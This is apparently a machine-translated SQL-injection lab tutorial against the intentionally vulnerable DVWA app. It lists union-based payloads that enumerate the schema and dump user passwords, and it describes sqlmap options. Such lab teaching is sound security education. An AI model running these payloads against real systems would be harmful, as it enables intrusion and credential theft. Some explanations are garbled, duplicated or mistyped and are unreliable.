私の連絡先情報
郵便メール:
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
効果:
説明: ドローン Web アプリケーションを使用して手動注射を練習します。
ステップ:
ターゲットドローンOWASPを開始
ブラウザ経由でドローンにアクセス
OWASP-dvwa プロジェクトにアクセスしてください
ログイン
SQLインジェクションアプリケーションの選択
注: 主に一重引用符とエスケープ文字を使用します。主に一重引用符を使用します。
原理:
#后台程序sql语句
select first_name,last_name from users where user_id = '$id';
#输入单引号('),相当于将sql语句闭合,后面就可以使用附加其他逻辑条件了
select first_name,last_name fro users where user_id = ''';
' union select 1,2 #
2. 論理和による
'or 1=1#
データベース名の取得
' union select 1,database()#
テーブルの取得
' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
列を取得
' union select column_name,1 from information_schema.columns where table_name='users' #
//1. 获取单个字段数据
' union select user,1 from users#
//2. 获取两个字段
' union select user,password from users#
機能: 複数の文字列を 1 つの文字列に結合します。
構文: concat(str1,str2,…)
例:
select user_id,concat (user,password) from dvwa,users;
select user_id,concat('user:',user,' password:',password) from dvwa.users;
' union select user,concat(first_name,' ',last_name,' ',password) from users#
注: 自動インジェクションとは、手動作業ではなくツールを使用して SQL インジェクション操作を完了することを指します。
ツール: SQLマップ
ツール: SQLマップ
パラメータ
ステップ
ログインする必要があるので、まずログインしたページの Cookie を取得します。
次に、注入ポイントのスキャンを開始します
注入成功
– current-db: 現在の Web で使用されているデータベース名をクエリします。
-D: 指定したデータベースを適用します
操作結果:
– current-db: 指定されたライブラリの下にあるすべてのテーブル名をクエリします (最初に -D を使用してライブラリ名を指定する必要があります)
-T: テーブルを指定
操作結果:
– columns: 指定されたテーブルの下のすべてのフィールドをクエリします (最初にテーブル名を指定するには -T を使用する必要があります)
-C: フィールド名を指定します
操作結果:
–dump: データをダウンロードします
操作結果: